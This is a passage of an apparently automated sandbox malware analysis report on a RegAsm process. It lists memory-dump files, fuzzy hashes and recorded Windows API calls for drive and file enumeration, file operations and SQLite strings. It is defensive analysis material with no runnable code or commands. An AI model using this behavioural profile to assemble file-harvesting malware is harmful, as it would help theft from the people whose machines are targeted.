                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 290ae97613b584264aaae71415ed981ecc71420f11d979129dbabea7d3cc78a8
                                                                                                                                                                                                                                                              • Instruction ID: 2328445efe7ab2f58eb15f40147bb64acd6b7df007c89a747e70fe0b03bcf46e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 290ae97613b584264aaae71415ed981ecc71420f11d979129dbabea7d3cc78a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 624112715002299FCB11CF69D8806ED7BB1FF89318F1484BADD55EB391D2786E82CB94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 51cafca5650e2118d254ae9eefb3e2f5288941b44b5279c34b8c0c76604affb9
                                                                                                                                                                                                                                                              • Instruction ID: bebd83ccdab7e7645d1c2bd5a0387410984b3a34777dd0c5b6702729d22ebb59
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51cafca5650e2118d254ae9eefb3e2f5288941b44b5279c34b8c0c76604affb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65414571A0060AAFCF24AF94C9809AFBBB1EB44314F10447FE915B73D1D6389A408F98
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040A727
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00409E01: _EH_prolog.MSVCRT ref: 00409E06
                                                                                                                                                                                                                                                                • Part of subcall function 00409E01: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423BDE,00000000,?,00000000), ref: 00409E85
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1592259726-0
                                                                                                                                                                                                                                                              • Opcode ID: 4e71af54d5813ddebd9f29d7ed5489b9703fd0989b69de78ef60b942adbe8713
                                                                                                                                                                                                                                                              • Instruction ID: db99cc98b8764f51ea57ff4030619b47d686214260cc602a4e861b125f3ab18f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e71af54d5813ddebd9f29d7ed5489b9703fd0989b69de78ef60b942adbe8713
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96216171900248EACF11EFAAC9067DDBFB4AF05304F00456EE88473282D7795718C7A6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00401E7D
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 004011D9: _EH_prolog.MSVCRT ref: 004011DE
                                                                                                                                                                                                                                                                • Part of subcall function 004011D9: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042037C,?,?,?,00420378,?,?,00000000,?,00000000), ref: 00401423
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1592259726-0
                                                                                                                                                                                                                                                              • Opcode ID: e1d64b6843ccd50feaeed3f14da3e32ea13c0b94452bc713152aaf92b6e6ebba
                                                                                                                                                                                                                                                              • Instruction ID: d1f4cdd05422496ba4789598eabb82facaa0504cf6f71ca0dc1c7c41109528fd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1d64b6843ccd50feaeed3f14da3e32ea13c0b94452bc713152aaf92b6e6ebba
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B219F71D00208ABDF10EFAAC90769CBFB4AF45314F00442EE85463292D7795758CBD6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?), ref: 199FF077
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: 8654bcf502aee92cd9707861456025348cfd6ed3d785b6744f8ce1add7882e13
                                                                                                                                                                                                                                                              • Instruction ID: bd1490d2599f812494635922f11e4e63b03cf5f57a4175756e0e54879696fe6b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8654bcf502aee92cd9707861456025348cfd6ed3d785b6744f8ce1add7882e13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDF0C23764151AABC7221E2D9C00B5AAF5C8F81AB1B2DC12EE858A61C0DE64A44593E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00414539
                                                                                                                                                                                                                                                                • Part of subcall function 0041179F: _EH_prolog.MSVCRT ref: 004117A4
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: _EH_prolog.MSVCRT ref: 00414342
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004143A4
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: memset.MSVCRT ref: 004143C3
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: GetDriveTypeA.KERNEL32(?), ref: 004143CC
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: lstrcpy.KERNEL32(?,00000000), ref: 004143EC
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: lstrcpy.KERNEL32(?,00000000), ref: 0041442D
                                                                                                                                                                                                                                                                • Part of subcall function 0041433D: lstrlen.KERNEL32(?), ref: 00414492
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 373919974-0
                                                                                                                                                                                                                                                              • Opcode ID: ec370033ae36458cbea9b5d2a7f5a1d78cb146b488f4ff8cbebb0cd2c248791d
                                                                                                                                                                                                                                                              • Instruction ID: 88c751316bf3e4fc80c263676f57d0e70ec488c72ca2e5da4737ae576ed00ee1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec370033ae36458cbea9b5d2a7f5a1d78cb146b488f4ff8cbebb0cd2c248791d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401D231800258EBCF10EF69C9427EEBBB5FF41354F10411AE8A563281D7385B89C7D6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 0040FD0B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileOperation
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3080627654-0
                                                                                                                                                                                                                                                              • Opcode ID: 3c595071a4135b8031b85ad395c977ac7bee5dc4871b64421426ef5372fe9827
                                                                                                                                                                                                                                                              • Instruction ID: 01fbf191d4210276dad4f55db658cef1fc33debfcdc509269fbf75e6b50e343d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c595071a4135b8031b85ad395c977ac7bee5dc4871b64421426ef5372fe9827
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCE0C2B0E0021D9FCB40DFE4E4452EEBBF4EF48308F40802AC409E7240E37442058BA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00414965
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,00000104), ref: 0041497C
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414983
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0041499B
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004149B2
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00424800), ref: 004149CF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00424804), ref: 004149E5
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414A05
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: _EH_prolog.MSVCRT ref: 00411819
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: memset.MSVCRT ref: 0041183A
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: memset.MSVCRT ref: 00411848
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: lstrcat.KERNEL32(?,00000000), ref: 00411874
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: lstrcat.KERNEL32(?), ref: 00411892
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: lstrcat.KERNEL32(?,?), ref: 004118A6
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: lstrcat.KERNEL32(?), ref: 004118B9
                                                                                                                                                                                                                                                                • Part of subcall function 00411814: StrStrA.SHLWAPI(00000000), ref: 00411953
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414A5C
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414A6B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414A90
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00414AA3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414AAC
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414AB9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$FindH_prolog$FileHeaplstrlenmemsetwsprintf$AllocCloseFirstNextProcess
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 4045355068-2848263008
                                                                                                                                                                                                                                                              • Opcode ID: fe63926c6cd3cf97e4c5c529332d9ec6d2a4bf5927c7ff9333cc56acf6d7899e
                                                                                                                                                                                                                                                              • Instruction ID: 567c827ee6608975b6beb6f2f07b68e66abb29bd87c872bfb5918980b20e7e96
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe63926c6cd3cf97e4c5c529332d9ec6d2a4bf5927c7ff9333cc56acf6d7899e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77512B71D00218ABCB10EFA0EC49ADE77BDFF44314F0045AAF515E2191EB399B99CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                                                                              • API String ID: 0-860711957
                                                                                                                                                                                                                                                              • Opcode ID: ed089a279da9bf69910c8f571f2e438c39d966157c0368938b985bdf8293940f
                                                                                                                                                                                                                                                              • Instruction ID: 0c68f2b67e15c579ae233aba161795c864399d12458b05ece06ee2f3599f37d2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed089a279da9bf69910c8f571f2e438c39d966157c0368938b985bdf8293940f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9712E2B89047419BE3238F24CD45B5777E8BF45308F2C452CE89A8B282E776F549CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                                                                                                                                                                                                                              • API String ID: 0-3496276579
                                                                                                                                                                                                                                                              • Opcode ID: 92ee90053a123345ddaf507b5cb9db29e4f803488371175f3e3a084cc88c38e9
                                                                                                                                                                                                                                                              • Instruction ID: 3eeb083b83e414e1786e339704fdbc0e0ced2dd0beb05189fa8e63b65453e937
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92ee90053a123345ddaf507b5cb9db29e4f803488371175f3e3a084cc88c38e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBC175755007499FC7118F28D84176BB7E4FF94310F2C492EE88A8B681E73AF559CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
